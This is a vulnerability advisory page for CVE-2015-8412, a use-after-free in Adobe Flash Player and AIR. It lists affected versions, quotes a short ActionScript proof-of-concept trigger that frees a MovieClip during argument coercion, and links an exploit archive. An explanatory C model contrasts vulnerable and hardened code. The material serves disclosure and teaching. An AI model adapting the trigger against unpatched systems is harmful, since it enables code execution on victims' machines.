Use-after-free vulnerability in multiple Adobe products

Vulnerability ID 1123161  Vulnerability type Other
Published 2015-12-18  Updated 2015-12-18
CVE ID CVE-2015-8412  CNNVD ID CNNVD-201512-242
Platform Windows  CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/39042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-242
|Vulnerability details
Adobe Flash Player, Adobe AIR SDK and Adobe AIR SDK & Compiler are products of Adobe, a US company. Adobe Flash Player is a multimedia player; Adobe AIR SDK and Adobe AIR SDK & Compiler are standard development kits for Adobe AIR, a cross-operating-system runtime environment. A use-after-free vulnerability exists in multiple Adobe products. An attacker can exploit it to execute arbitrary code and take control of the affected system. The following products and versions are affected: Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier and Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh; Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and Chrome OS; Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10; Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1; Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux; AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh; AIR SDK 19.0.0.241 and earlier and AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS; AIR for Android 19.0.0.241 and earlier on Android.
|Vulnerability EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=591

There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);

// The depth argument is an object whose valueOf() is script-controlled;
// it runs while duplicateMovieClip() coerces the argument to a number.
mc.duplicateMovieClip("mc", {valueOf : func});

function func() {
	trace("in func");
	mc.removeMovieClip();   // frees the clip that duplicateMovieClip is still using

	// Fix heap here

	return 5;
}

A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39042.zip
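The bug class behind this advisory (a native method that runs script-supplied toString/valueOf while coercing an argument, so that script can free the object the method is about to use) can be modelled in a few dozen lines of C. The code below is an added example written for this page; it is not Flash Player code and not the researcher's PoC. Clip, stage_slot, coerce_removes_clip, duplicate_vulnerable, duplicate_hardened and run_scenario are constructed names, and the one-slot "stage" is a simplification of a real display list. It places the vulnerable ordering (coerce, then use) next to the hardened ordering (retain, coerce, re-validate, release), which is the general fix for any API that calls back into untrusted code in the middle of an operation.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy reference-counted display object standing in for a MovieClip.
 * Constructed for this example; not Flash Player's real structure. */
typedef struct Clip {
    int refcount;
    int alive;        /* cleared when the last reference is dropped */
    char name[16];
    int depth;
} Clip;

/* One-slot "display list" owning a reference to the attached clip, the way
 * the stage owns a MovieClip until removeMovieClip() is called. */
Clip *stage_slot = NULL;

static Clip *clip_new(const char *name) {
    Clip *c = calloc(1, sizeof *c);
    if (c == NULL) abort();
    c->refcount = 1;
    c->alive = 1;
    strncpy(c->name, name, sizeof c->name - 1);
    return c;
}

static void clip_retain(Clip *c) { c->refcount++; }

/* A real engine frees the block on the last release. Here the block is kept
 * and only flagged dead so the scenario can report the misuse as a status
 * code instead of reading freed memory. */
static void clip_release(Clip *c) {
    if (--c->refcount == 0)
        c->alive = 0;
}

/* Stand-in for the script-supplied valueOf()/toString() that the method
 * invokes while converting its depth argument to a number. */
typedef int (*coerce_fn)(void);

/* Mirrors the PoC's valueOf: detach the clip from the stage (dropping the
 * stage's reference) and then hand back a number. */
int coerce_removes_clip(void) {
    Clip *c = stage_slot;
    stage_slot = NULL;
    clip_release(c);
    return 5;
}

/* An ordinary valueOf that just returns a number. */
int coerce_benign(void) { return 5; }

enum { DUP_OK = 0, DUP_TARGET_DETACHED = 1, DUP_USE_AFTER_FREE = -1 };

/* Vulnerable ordering: resolve the target, run script to coerce the
 * argument, then touch the target without re-checking it. */
static int duplicate_vulnerable(Clip *target, coerce_fn depth_arg) {
    int depth = depth_arg();            /* untrusted script runs here */
    if (!target->alive)
        return DUP_USE_AFTER_FREE;      /* what ASan or a tracked heap would flag */
    target->depth = depth;
    return DUP_OK;
}

/* Hardened ordering: hold our own reference across the callback so the
 * object cannot die mid-call, re-validate that it is still attached before
 * using it, and release the reference on every path. */
static int duplicate_hardened(Clip *target, coerce_fn depth_arg) {
    int status;
    clip_retain(target);
    int depth = depth_arg();            /* script may detach the clip here */
    if (!target->alive) {
        status = DUP_USE_AFTER_FREE;    /* unreachable: we hold a reference */
    } else if (stage_slot != target) {
        status = DUP_TARGET_DETACHED;   /* safe bail-out; object still valid */
    } else {
        target->depth = depth;
        status = DUP_OK;
    }
    clip_release(target);
    return status;
}

/* Builds a stage with one clip, runs one implementation against one
 * coercion callback, tears the stage down and returns the status code. */
int run_scenario(int hardened, coerce_fn depth_arg) {
    Clip *c = clip_new("mc");           /* refcount 1, owned by the stage */
    stage_slot = c;
    int status = hardened ? duplicate_hardened(c, depth_arg)
                          : duplicate_vulnerable(c, depth_arg);
    if (stage_slot == c) {              /* stage still owns it: drop that ref */
        stage_slot = NULL;
        clip_release(c);
    }
    free(c);                            /* block was kept only for the model */
    return status;
}

int main(void) {
    printf("vulnerable, valueOf removes clip: %d (expect -1)\n",
           run_scenario(0, coerce_removes_clip));
    printf("hardened,   valueOf removes clip: %d (expect 1)\n",
           run_scenario(1, coerce_removes_clip));
    return 0;
}
```

The hardened version does two separate things, and both matter: the extra reference keeps the object alive while arbitrary script runs, and the post-callback check (`stage_slot != target`) notices that the world changed and bails out rather than operating on a detached clip. Holding the reference without re-validating would be memory-safe but could still act on stale state.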
|References

Source: helpx.adobe.com
Link: https://helpx.adobe.com/security/products/flash-player/apsb15-32.html